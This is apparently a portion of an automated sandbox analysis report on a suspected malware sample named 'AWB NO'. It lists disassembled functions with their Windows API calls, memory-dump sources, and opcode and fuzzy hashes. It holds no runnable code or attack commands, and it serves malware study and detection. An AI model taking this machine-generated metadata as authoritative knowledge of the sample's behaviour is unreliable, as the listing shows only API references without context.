                                                              Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                              • GetClientRect.USER32(?,?), ref: 0043B84B
                                                              • GetCursorPos.USER32(?), ref: 0043B855
                                                              • ScreenToClient.USER32(?,?), ref: 0043B860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
                                                              • Instruction ID: 88478fa3ad29557ab13713681797212a94603c3b61ccda0d63648654153e7648
                                                              • Opcode Fuzzy Hash: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
                                                              • Instruction Fuzzy Hash: 82112B39510019EBCB00EF94D8859AE77B8FB05300F1048AAF901F7291D734AA569BA9
                                                              Function 00464D35 Relevance: 6.1, APIs: 4, Instructions: 56synchronizationthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00464D5C
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00464D8F
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464DA5
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464DAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 9a322c1cdd5e0a6c12338506eb066ae180f8c54d82c0008625fa69e03bdf94fe
                                                              • Instruction ID: 0819fc12fe5724ab96ebf4294b1419f29c00e38ef056b8eae01a1cb4f58a9b66
                                                              • Opcode Fuzzy Hash: 9a322c1cdd5e0a6c12338506eb066ae180f8c54d82c0008625fa69e03bdf94fe
                                                              • Instruction Fuzzy Hash: 0811E5B2904204BBCB11ABA8DC08ADF7BACEB85324F1442BAF915D3350E6798D4487A5
                                                              Function 00461652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 0046166F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 00461694
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 0046169E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 004616D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID:
                                                              • API String ID: 2875609808-0
                                                              • Opcode ID: 0b4158977cd20458f831617008364a677d5e8f004bfccfd560a8846e3b24cbac
                                                              • Instruction ID: 3f0d788a5ca093e10d78b07811411c4065f6d909a54a70e169c6da1dd9049ef0
                                                              • Opcode Fuzzy Hash: 0b4158977cd20458f831617008364a677d5e8f004bfccfd560a8846e3b24cbac
                                                              • Instruction Fuzzy Hash: E6115A35D0052DE7CF009FA5D948AEEBB78FF09701F08446BE940B2250DB3459608B9B
                                                              Function 0048B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0048B59E
                                                              • ScreenToClient.USER32(?,?), ref: 0048B5B6
                                                              • ScreenToClient.USER32(?,?), ref: 0048B5DA
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B5F5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                              • Instruction ID: c1ec13a6a315efdf6b243f43d6614c5161e9ce39f19ad1524a172358c11b1c05
                                                              • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                              • Instruction Fuzzy Hash: 261146B5D00209EFDB41DF99C444AEEFBB5FF18310F104566E914E3620D735AA558F94
                                                              Function 0048C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                • Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C030
                                                              • LineTo.GDI32(00000000,?,?), ref: 0048C03D
                                                              • EndPath.GDI32(00000000), ref: 0048C04D
                                                              • StrokePath.GDI32(00000000), ref: 0048C05B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
                                                              • Instruction ID: 674b4468024ad211d301666b20e3bfa7de505a3549e2e29f62cfbf593809ea28
                                                              • Opcode Fuzzy Hash: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
                                                              • Instruction Fuzzy Hash: BAF0BE31001219BBDB127F90AC09FCE3F58AF06310F148429FA11210E287794564DBAD
                                                              Function 0045A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0045A399
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A3AC
                                                              • GetCurrentThreadId.KERNEL32 ref: 0045A3B3
                                                              • AttachThreadInput.USER32(00000000), ref: 0045A3BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 59fde793fe6ed64e4cc0a9af18dd4c6470d45542e5beb6ebbb22759278acb506
                                                              • Instruction ID: ed216a13ff48d043802f8fe8c2a36ac0c7a485d78d52065609e6dcc2b31109e9
                                                              • Opcode Fuzzy Hash: 59fde793fe6ed64e4cc0a9af18dd4c6470d45542e5beb6ebbb22759278acb506
                                                              • Instruction Fuzzy Hash: 86E03931141228BBDB201BA2DC0CEDB3F1CEF167A2F008639F90894061D7798969DBA9
                                                              Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00402231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                              • GetStockObject.GDI32(00000005), ref: 00402258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0043C0D3
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043C0E0
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0043C0F9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0043C112
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0043C132
                                                              • ReleaseDC.USER32(?,00000000), ref: 0043C13D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 27b2581c254cdff319ff0ea5d8f2be35128cc34943b3abbe395981e759962590
                                                              • Instruction ID: 007a7e945b926db1975f0eb4024d1954444be121fda63f18d3fd7a61cce91000
                                                              • Opcode Fuzzy Hash: 27b2581c254cdff319ff0ea5d8f2be35128cc34943b3abbe395981e759962590
                                                              • Instruction Fuzzy Hash: 58E03932100244EADB215FA8EC4D7DD3B20AB05332F10837AFAA9580E287764994DB15
                                                              Function 00458C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 00458C63
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0045882E), ref: 00458C6A
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0045882E), ref: 00458C77
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0045882E), ref: 00458C7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                              • Instruction ID: 148d01963af32c2189f656cf55398bdaca1906d37348cb6d923cd77144567ac4
                                                              • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                              • Instruction Fuzzy Hash: 12E04F366422119BE7205FB46D0CB5B3BA8AF55792F144C3CA645D9041DA3884498B65
                                                              Function 00442187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00442187
                                                              • GetDC.USER32(00000000), ref: 00442191
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004421B1
                                                              • ReleaseDC.USER32(?), ref: 004421D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 5bbe9da29bb028000d041de13fcf9ef3459c43b5ca73f2136cb50eb93e1f9c3e
                                                              • Instruction ID: e80bcdaed25015b38fc075b9af120d0661f73bd954452babf2cca2976e4e6e99
                                                              • Opcode Fuzzy Hash: 5bbe9da29bb028000d041de13fcf9ef3459c43b5ca73f2136cb50eb93e1f9c3e
                                                              • Instruction Fuzzy Hash: 8BE01A75900204EFDB019FA0C808A9D7BF1EF5C350F108A3AF95AE7260DB7885569F49
                                                              Function 0044219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 0044219B
                                                              • GetDC.USER32(00000000), ref: 004421A5
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004421B1
                                                              • ReleaseDC.USER32(?), ref: 004421D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 759070b2aa7e70da72d0065fe67b3aad0a5dd84fe2bb9f944ae5bc76f43ec042
                                                              • Instruction ID: 0585887194f83d5896a0f01572a955ee9a0ca529f388d05c95cdd3c21f880870
                                                              • Opcode Fuzzy Hash: 759070b2aa7e70da72d0065fe67b3aad0a5dd84fe2bb9f944ae5bc76f43ec042
                                                              • Instruction Fuzzy Hash: 98E01A75900204EFCB019FB0C80869D7BF1EF5C310F108939F95AA7260DB3895569F48
                                                              Function 0046ED8E Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X
                                                              • API String ID: 0-3081909835
                                                              • Opcode ID: 78dcd989974ff6f98f82db94458459d0756c027123f6ceb7d83543aa6ff017c1
                                                              • Instruction ID: e5faa3e43e2d4f2b39f1221ea160a1343461ec5a37f38ef29422b0ed6a717957
                                                              • Opcode Fuzzy Hash: 78dcd989974ff6f98f82db94458459d0756c027123f6ceb7d83543aa6ff017c1
                                                              • Instruction Fuzzy Hash: 8FC161756083009FC714EF25D885A5BB7E4EF85314F00492EF899972A2EB38ED45CB9B
                                                              Function 00412AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00412AC8
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412AE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: b558b19cd7410ff0673be4cd2c30f66381e90844ad9ecc940d55a87096154234
                                                              • Instruction ID: 198fa7249bf4a10115936ac5cec7f523fb376c2af7af020f0510a7a60b6fc721
                                                              • Opcode Fuzzy Hash: b558b19cd7410ff0673be4cd2c30f66381e90844ad9ecc940d55a87096154234
                                                              • Instruction Fuzzy Hash: 28517A715187449BD320AF15DC85BAFBBE8FFC4314F42486DF2D9510A2DB749828CB2A
                                                              Function 0044099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID: DtL$DtL
                                                              • API String ID: 1473721057-1281546423
                                                              • Opcode ID: ba00002b2a634e8d7a596488485226b2de833e29279846e854443180cd2b2818
                                                              • Instruction ID: da1fff8ce702562cff1de6885822424690271d2b2b1ac71984817684a9cead06
                                                              • Opcode Fuzzy Hash: ba00002b2a634e8d7a596488485226b2de833e29279846e854443180cd2b2818
                                                              • Instruction Fuzzy Hash: B7510578608341CFD754CF19C480A1ABBF1BB99344F54886EE9859B3A1D339EC91CF4A
                                                              Function 00486CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00486D86
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 9c170b6e62782a39325b379c71f121cdc45194cdd9bfa83a2855cc7d2f6a19fb
                                                              • Instruction ID: ac4952246417f6e5eabf139c329a91c40342bfa59b822e976b0221753ab176b8
                                                              • Opcode Fuzzy Hash: 9c170b6e62782a39325b379c71f121cdc45194cdd9bfa83a2855cc7d2f6a19fb
                                                              • Instruction Fuzzy Hash: 22319271200204AEDB10AF64DC40BFF73A8FF48714F11892EF89597190DA35AC51DB68
                                                              Function 00486943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004869D0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004869DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: bcfd4814bd11f60ceb698292fccd5a8b961f0c50819f1fee78ff055a4f109a5e
                                                              • Instruction ID: 6041aa2516f7a9dd56df650238f776de4a8a29a273b23500d66360a3029cdda3
                                                              • Opcode Fuzzy Hash: bcfd4814bd11f60ceb698292fccd5a8b961f0c50819f1fee78ff055a4f109a5e
                                                              • Instruction Fuzzy Hash: 4711B6B16002086FEF51AF14CC80EAF376EEB843A4F12452AF958973D0D6799C5187A4
                                                              Function 00486E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 00486EE0
                                                              • GetSysColor.USER32(00000012), ref: 00486EFA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: f2d810d17fd63640c0199e69d22ca8f20409b6ce86d908634d9821f1fc52f206
                                                              • Instruction ID: 29a9b64aecc222300d436bcd3a63065e5534f5b76e47b581503888c6130dc53c
                                                              • Opcode Fuzzy Hash: f2d810d17fd63640c0199e69d22ca8f20409b6ce86d908634d9821f1fc52f206
                                                              • Instruction Fuzzy Hash: 39215C72610209AFDB05EFA8DC45EFE7BB8FB08314F014A29FD55D3250D638E8619B54
